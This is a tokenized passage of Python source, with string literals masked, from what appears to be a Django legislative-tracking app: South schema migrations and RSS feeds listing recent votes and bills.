[ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . utils . translation import ugettext as _ <EOL> from django . contrib . syndication . views import Feed <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . core . urlresolvers import reverse <EOL> from models import Vote , Bill <EOL> class Votes ( Feed ) : <EOL> title = _ ( "<STR_LIT>" ) <EOL> author_name = _ ( "<STR_LIT>" ) <EOL> description = "<STR_LIT>" <EOL> def items ( self ) : <EOL> return Vote . objects . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:20> ] <EOL> def item_title ( self , item ) : <EOL> return item . title <EOL> def item_description ( self , item ) : <EOL> return item . summary <EOL> class Bills ( Feed ) : <EOL> title = _ ( "<STR_LIT>" ) <EOL> description = _ ( "<STR_LIT>" ) <EOL> def author_name ( self ) : <EOL> return _ ( "<STR_LIT>" ) <EOL> def link ( self ) : <EOL> return reverse ( '<STR_LIT>' ) <EOL> def get_object ( self , request ) : <EOL> '''<STR_LIT>''' <EOL> stages = request . GET . get ( '<STR_LIT>' , False ) <EOL> self . stages = stages . split ( '<STR_LIT:U+002C>' ) if stages else False <EOL> return None <EOL> def items ( self ) : <EOL> bills = Bill . objects . order_by ( '<STR_LIT>' ) <EOL> if self . stages : <EOL> bills = bills . filter ( stage__in = self . stages ) <EOL> return bills [ : <NUM_LIT:20> ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , 
'<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , 
[ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> 
'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:text>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , 
<EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) 
